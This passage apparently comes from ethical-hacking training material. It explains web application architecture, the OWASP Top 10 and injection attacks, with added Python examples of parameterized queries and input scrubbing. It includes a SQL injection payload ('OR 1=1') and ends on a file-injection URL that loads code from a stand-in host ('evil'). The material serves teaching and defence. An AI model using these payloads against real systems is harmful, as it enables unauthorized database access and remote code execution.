Module Objectives

The evolution of Internet and Web technologies, combined with rapidly increasing Internet connectivity, defines the new business landscape. Web applications are an integral component of online business. Everyone connected via the Internet is using an endless variety of web applications for many different purposes, including online shopping, email, chats, and social networking.

Increasingly, web applications are becoming vulnerable to more sophisticated threats and attack vectors. This module will familiarize you with various web applications, web attack vectors, and how to protect an organization's information resources from them. It describes the general web-application hacking methodology that most attackers use to exploit a target system. Ethical hackers can use this methodology to assess their organization's security against web-application attacks. Thus, this module also presents several tools that are helpful at different stages of web-application security assessment.

At the end of this module, you will be able to:

■    Describe web application concepts

■    Perform various web application attacks

■    Describe the web application hacking methodology

■    Use different web application hacking tools

■    Apply web application attack countermeasures

■    Use different web application security testing tools

■    Perform web application penetration testing


Web App Concepts

This section describes the basic concepts associated with web applications vis-à-vis security concerns: their components, how they work, their architecture, and so on. Furthermore, it provides insight into Web 2.0 applications, vulnerability stacks, and possible web attack vectors on web applications.


Introduction to Web Applications

Web applications are software programs that run in web browsers and act as the interface between users and web servers through web pages. They help users request, submit, and retrieve data to/from a database over the Internet through a user-friendly graphical user interface (GUI). Users can input data via keyboard, mouse, or touch interface, depending on the device they are using to access the web application. Built on browser-supported languages such as JavaScript, HTML, and CSS, web applications work in combination with other languages such as SQL to access data from databases.

Web applications have helped in making web pages dynamic, as they allow users to communicate with servers using server-side scripts. They allow the user to perform specific tasks such as searching, sending emails, connecting with friends, online shopping, and tracking and tracing. Web versions of desktop applications are also available, giving users the flexibility to work over the Internet as well.

Entities develop various web applications to offer their services to users via the Internet. Whenever users need access to such services, they can request them by submitting the uniform resource identifier (URI) or uniform resource locator (URL) of the web application in a browser. The browser passes this request to the server, which stores the web application data and returns it for display in the browser. Some popular web servers are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE.

The increased Internet and online business usage has accelerated the development and ubiquity of web applications across the globe. A key factor in the adoption of web applications for business use is the multitude of features they offer. In addition, they are relatively easy to develop, offer better services than many computer-based software applications, are easy to install and maintain, are secure, and are easy to update.

Advantages of web applications include:

■    Being operating-system independent makes development and troubleshooting easy as well as cost-effective.

■    They are accessible anytime, anywhere, using a computer with an Internet connection.

■    The user interface is customizable, making it easy to update.

■    Users can access them on any device having an Internet browser, including PDAs, smart phones, etc.

■    Dedicated servers, monitored and managed by experienced server administrators, store all the web application data, allowing the developers to increase the workload capacity.

■    Multiple server locations not only help in increasing physical security, but also lessen the burden of monitoring thousands of desktops using the program.

■ They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL Server, and .NET scripting languages, which are scalable and support even portable platforms.

Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Web technologies such as Web 2.0 provide more attack surface for web application exploitation. Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency.

How Web Applications Work

The main function of web applications is to fetch user-requested data from a database. When a user clicks or enters a URL in a browser, the web application immediately displays the requested website content in the browser.

This mechanism involves the following step-by-step process:

■    First, the user enters the website name or URL in the browser. The user's request is sent to the web server.

■    On receiving the request, the web server checks the file extension:

o If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.

o If the user requests a web page with an extension that needs to be processed on the server side (PHP, ASP, CFM, etc.), then the web application server must process the request.

■    Therefore, the web server passes the user's request to the web application server, which processes the user's request.

■    The web application server accesses the database to perform the requested task by updating or retrieving the information stored on it.

■    After processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.


Web Application Architecture

Web applications run on web browsers and use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of the web application depends on its architecture, which includes hardware and software that performs tasks such as reading the request, searching, gathering, and displaying the required data.

The web application architecture includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. The web application architecture comprises three layers:

1.   Client or presentation layer

2.   Business logic layer

3.   Database Layer

The client or presentation layer includes all physical devices present on the client side, such as laptops, smart phones, and computers. These devices feature operating systems and compatible browsers, which enable users to send requests for required web applications. The user requests a website by entering a URL in the browser, and the request travels to the web server. The web server responds to the request and fetches the requested data; the application displays this response in the browser in the form of a web page.

The "business logic" layer itself is composed of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components, such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and hardware components such as the server itself. It has a firewall that offers security to the content, an HTTP request parser to handle requests coming from clients and forward responses to them, as well as a resource handler capable of handling multiple requests simultaneously. The web-server logic layer holds all the code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).

The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware" technologies. It defines how the data flows, according to which the developer builds the application using programming languages. The business logic layer stores the application data and integrates legacy applications with the latest functionality of the application. The server needs a specific protocol to access user-requested data from its database; this layer also contains the software and defines the steps to search and fetch the data.

The database layer is composed of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in structured form (e.g., MS SQL Server, MySQL server).

Web 2.0 Applications

"Web 2.0" refers to technologies that use dynamic web pages, thus superseding the Web 1.0 technology, which used static HTML web pages. Web 2.0 allows users to upload and download information simultaneously from a Web 2.0 website. It provides an infrastructure for more dynamic user participation, social interaction, and collaboration.

The client-side technologies used for developing a Web 2.0 site include frameworks, SDKs, and markup languages, namely jQuery, Ext JS, and Prototype JavaScript Framework; Apache Flex; HTML5; and so on. These technologies enhance the ability of Web 2.0 sites, enabling users to interact continuously, play audio and video files, edit documents online, and so on.

Server-side technologies used for developing Web 2.0 sites include languages such as PHP, Ruby, Perl, and Python, as well as Enterprise Java (J2EE) and the Microsoft .NET Framework, which output data dynamically using information from files and databases. The present technology allows multiple Web 2.0 sites to interact and share data seamlessly.

Web 2.0 facilities

■ Interoperability

o Blogs (WordPress)

o Advanced gaming

o Dynamic as opposed to static site content

o RSS-generated syndication

■ User-centered Design

o Social networking sites (Facebook, Twitter, LinkedIn, etc.)

o Mash-ups (Emails, IMs, Electronic payment systems)

o Wikis and other collaborative applications

o Google Base and other free Web services (Google Maps)

■ Collaboration on the Web

o Cloud computing websites (amazon.com)

o Interactive encyclopedias and dictionaries

o Online office software (Google Docs and Microsoft Silverlight)

o Ease of data creation, modification, or deletion by individual users

■ Interactive Data Sharing

o New technologies like AJAX (Gmail, YouTube)

o Mobile applications (iPhone)

o Flash rich interface websites

o Frameworks (Yahoo! UI Library, jQuery)


Vulnerability Stack

One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each layer help the user in one way or another to access the web application securely. When talking about web applications, organizations consider security a critical component because web applications are major targets of attacks. The following vulnerability stack shows the layers and the corresponding element/mechanism/service employed at each layer, which make web applications vulnerable.

Attackers make use of vulnerabilities in one or more elements among the seven levels to exploit them and gain unrestricted access to an application or to the entire network.

■    Layer 7

If an attacker finds vulnerabilities in business logic (implemented using languages such as .NET and Java), he/she can exploit these vulnerabilities by performing input validation attacks such as XSS.

■    Layer 6

Third-party components are services that integrate with the website to achieve certain functionality (e.g., Amazon.com targeted by an attacker is the main website; citrix.com is a third-party website).

When customers choose a product to buy, they click on a Buy/Checkout button. This redirects them to their online banking account through a payment gateway. Third-party websites such as citrix.com offer such payment gateways. Attackers might exploit this redirection and use this as a medium/pathway to enter Amazon.com and exploit it.


■    Layer 5

Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. Attackers might find vulnerabilities in a target website's database. Then they exploit these vulnerabilities using tools such as sqlmap to get hold of the target's database.

■    Layer 4

Web servers are software programs that host websites. When users access a website, they send a URL request to the web server. The server parses this request and responds with a web page, which appears in the browser. Attackers can employ footprinting on the web server that hosts the target website and grab banners that contain information such as the web server name and its version. Attackers can use tools such as Nmap to gather information about the web server name and its version. They might then search the CVE database for published vulnerabilities in that particular web server or service version and exploit any that they find.

■    Layer 3

Attackers scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them. They send the malware through open ports to the target machine; by running it, attackers compromise the machines and get control over them. Later, they try to access the databases of the target website.

■    Layer 2

Routers/switches route network traffic only to specific machines. Attackers flood these switches with a huge number of requests that exhaust the CAM table, leading the switch to behave like a hub. Then they target the website by sniffing data on the network, which can include credentials or other personal information.

■    Layer 1

IDS and IPS trigger alarms if any malicious traffic enters a target machine or server. Attackers perform evasion techniques to circumvent intrusion detection systems, so that while exploiting the target, the IDS/IPS does not trigger any alarm.

Web App Threats

Attackers try various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information. This section discusses various types of threats and attacks against the vulnerabilities of web applications.


OWASP Top 10 Application Security Risks - Source: https://www.owasp.org

OWASP is an international organization that publishes the top 10 vulnerabilities and flaws of web applications. Following are the latest OWASP top 10 application security risks.

■   A1 - Injection

Injection flaws, such as SQL, command injection, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

■   A2 - Broken Authentication

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume other users' identities (temporarily or permanently).

■   A3 - Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII (Personally Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

■   A4 - XML External Entity (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.

■   A5 - Broken Access Control

Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, changing access rights, etc.

■   A6 - Security Misconfiguration

Security misconfiguration is the most common issue in web security, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, and not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all).

■   A7 - Cross-Site Scripting (XSS)

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or it updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

■   A8 - Insecure Deserialization

Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered, or deleted to spoof users, conduct injection attacks, and elevate privileges.

■   A9 - Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

■   A10 - Insufficient Logging & Monitoring

Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

A1 - Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers.

Attackers inject malicious code, commands, or scripts into the input fields of flawed web applications in such a way that the applications interpret and run the newly supplied malicious input, which in turn allows them to extract sensitive information. By exploiting injection flaws in web applications, attackers can easily read, write, delete, and update any data (i.e., relevant or irrelevant to that particular application). There are many types of injection flaws, some of which are discussed below:

■ SQL Injection: SQL injection is the most common website vulnerability on the Internet, and is used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application, for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database.

■ Command Injection: Attackers identify an input validation flaw in an application and exploit the vulnerability by injecting a malicious command in the application to execute supplied arbitrary commands on the host operating system. Thus, such flaws are highly dangerous.

■ LDAP Injection: LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize the user input, the attacker modifies the LDAP statement with the help of a local proxy. This in turn results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree.


SQL Injection Attacks

SQL injection attacks use a series of malicious SQL queries or SQL statements to directly manipulate the database. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store, obtain information for the application and user, and link to other data sources. The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,

SELECT * FROM tablename WHERE UserID= 2302

becomes the following with a simple SQL injection attack:

SELECT * FROM tablename WHERE UserID= 2302 OR 1=1

The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. An attacker uses a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data. Attackers carry out SQL injection attacks from the web browser's address bar, form fields, queries, searches, and so on. SQL injection attacks allow attackers to:

■    Log into the application without supplying valid credentials

■    Perform queries against data in the database, often even data to which the application would not normally have access

■    Modify database contents, or drop the database altogether

■    Use the trust relationships established between the web application components to access other databases

Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 15: SQL Injection.
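As an added illustration of the "OR 1=1" case above (example code written for this section, not from the original module), here is the same lookup built by string concatenation beside a parameterized version, run against a constructed in-memory SQLite table; the table name `users` and its rows are assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the module): three users in an in-memory DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (UserID INTEGER, Name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [(2301, "alice"), (2302, "bob"), (2303, "carol")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The flawed pattern: the raw input is concatenated into the statement,
    so the database parses whatever the user typed as SQL."""
    sql = "SELECT * FROM users WHERE UserID= " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """The fix: the input is bound as a parameter. The driver passes it as a
    value, never as SQL text, so 'OR 1=1' cannot change the query's logic."""
    return conn.execute(
        "SELECT * FROM users WHERE UserID= ?", (user_id,)
    ).fetchall()


def demo():
    """Run both lookups with a benign ID and with the module's injected input."""
    conn = make_db()
    benign = "2302"
    hostile = "2302 OR 1=1"
    return {
        # one row, as intended
        "vulnerable_benign": lookup_vulnerable(conn, benign),
        # every row: the WHERE clause is now always true
        "vulnerable_hostile": lookup_vulnerable(conn, hostile),
        # one row: SQLite applies the column's numeric affinity to "2302"
        "param_benign": lookup_parameterized(conn, benign),
        # no rows: "2302 OR 1=1" is compared as a literal value, not parsed
        "param_hostile": lookup_parameterized(conn, hostile),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```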


Command Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via web applications. The attacks include calls to the operating system via system calls, the use of external programs via shell commands, and calls to backend databases via SQL. Scripts in Perl, Python, and other languages execute these calls, and poorly designed web applications insert attacker-supplied data into them. If a web application uses any type of interpreter, attackers can insert malicious code to inflict damage.

To perform functions, web applications must use operating system features and external programs. Many programs are invoked externally; one frequently used program is Sendmail. An application must carefully scrub every piece of information before passing it through an external request. Otherwise, attackers can insert special characters, malicious commands, and command modifiers into that information, and the web application then blindly passes these characters to the external system for execution. Inserting SQL is a widespread and dangerous form of command injection. Command injection attacks are easy to carry out and discover, but they are difficult to understand.
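An added example (not the module's own code) contrasting the two halves of the paragraph above: a Sendmail-style command assembled from unscrubbed input, and the scrub-then-argv pattern that keeps command modifiers inert. The recipient allowlist regex and the use of a Python child process to stand in for the external program are assumptions.

```python
import re
import subprocess
import sys

# Constructed inputs for the demonstration (not from the original module).
BENIGN = "bob@example.com"
HOSTILE = "bob@example.com; echo INJECTED"

# Hypothetical allowlist for a mail recipient; tighten it to your own policy.
RECIPIENT_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def vulnerable_command(recipient):
    """Builds the shell string a flawed application would hand to the OS.
    It is returned, not executed: the ';' would end the sendmail command
    and start a second one if a shell parsed it."""
    return "sendmail " + recipient


def scrub_recipient(recipient):
    """Reject any value that does not match the allowlist before it can
    reach a command line. Metacharacters never pass this check."""
    if not RECIPIENT_RE.fullmatch(recipient):
        raise ValueError("recipient rejected: %r" % recipient)
    return recipient


def is_rejected(recipient):
    """True when the scrubber refuses the value."""
    try:
        scrub_recipient(recipient)
    except ValueError:
        return True
    return False


def run_as_argv(value):
    """Defence in depth: pass the value as a single argv element with no
    shell involved, so ';' is ordinary text. A Python child process that
    prints its first argument stands in for the external program."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.strip()


if __name__ == "__main__":
    print("shell string:", vulnerable_command(HOSTILE))
    print("scrubber rejects hostile:", is_rejected(HOSTILE))
    # The whole hostile string comes back unchanged: nothing after ';' ran.
    print("argv child saw:", run_as_argv(HOSTILE))
```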

Following are some types of command injection attacks.

■ Shell Injection

o An attacker tries to craft an input string to gain shell access to a web server

■ HTML Embedding

o This type of attack is used to deface websites virtually. Using this attack, an attacker adds an extra HTML-based content to the vulnerable web application

o In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting

■ File Injection

o The attacker exploits this vulnerability and injects malicious code into system files

http://www.certifiedhacker.com/vulnerable.php?COLOR=http://evil/exploit?